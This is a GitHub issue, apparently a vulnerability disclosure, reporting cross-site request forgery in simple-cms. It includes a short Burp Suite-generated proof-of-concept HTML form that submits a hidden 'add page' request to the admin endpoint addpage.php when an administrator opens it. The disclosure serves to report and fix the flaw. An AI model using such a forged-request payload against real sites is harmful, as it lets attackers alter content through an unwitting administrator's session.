simple-cms has Cross-site request forgery #3

SunJ3t · 2018-08-08T03:57:57Z

http://192.168.2.129/simple/admin/

I can add page when admin click the html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.2.129/simple/admin/addpage.php" method="POST">
      <input type="hidden" name="pageTitle" value="csrftest" />
      <input type="hidden" name="pageCont" value="csrftest" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The text was updated successfully, but these errors were encountered:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

simple-cms has Cross-site request forgery #3

simple-cms has Cross-site request forgery #3

SunJ3t commented Aug 8, 2018 •

edited

Loading

simple-cms has Cross-site request forgery #3

simple-cms has Cross-site request forgery #3

Comments

SunJ3t commented Aug 8, 2018 • edited Loading

SunJ3t commented Aug 8, 2018 •

edited

Loading